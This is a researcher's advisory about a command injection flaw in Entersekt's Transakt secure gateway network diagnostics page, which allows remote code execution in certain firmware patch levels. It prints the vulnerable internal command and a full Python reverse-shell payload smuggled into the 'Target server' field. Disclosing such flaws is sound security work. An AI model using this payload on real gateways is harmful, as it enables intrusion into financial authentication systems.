Entersekt Transakt secure gateway - Remote Code Execution via OpenSSL diagnostics in GA 23.1-4824 patch 1 and GA 23.1-4825 patch 2
The product "Transakt" from Entersekt is known and used in the financial market, at the latest since the European PSD2 directive, as a 2FA authentication solution. There are white-label smartphone apps from different financial institutions (Play Store search for 'com.entersekt.authapp').
They may use the "secure gateway" hardware as an on-premise installation.
Log into the Web UI as admin, go to the main tab Diagnostics, then select the sub tab Network Diagnostics.
For the OpenSSL Connect check, the value in the input field needs to end with a :port to be considered valid. Ok ;-)
Since the "Target server" input field is not sanitized, we can start a reverse shell by clicking [Start OpenSSL Connect].
Internally the command is executed as:
    sh -c "echo | openssl s_client -connect <payload>"
Payload to trigger the reverse shell and to fulfil the :port requirement at the end:
    ; /usr/bin/python3 -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' ; :443
We are connected from the system as user tomcat :-)
Firmware GA 23.1-4824 patch 1 introduced the possibility of network diagnostics via an OpenSSL connect and opened the door for this Remote Code Execution.
Months later I found this vulnerability and reported it. Entersekt confirmed it and stated "already fixed with patch 3".
Firmware GA 23.1-4825 patch 2 was vulnerable too.
Firmware GA 23.1-4826 patch 3 closed the RCE possibility, but without any "security fix" reference or CVE entry in the changelog.
Access should only be possible from the internal network behind a DMZ and as a user with the admin role.
But why do I write this post? Maybe I think "Be honest about known vulnerabilities", because you will not find any advisory or CVE about this.
Disclaimer
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2024 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.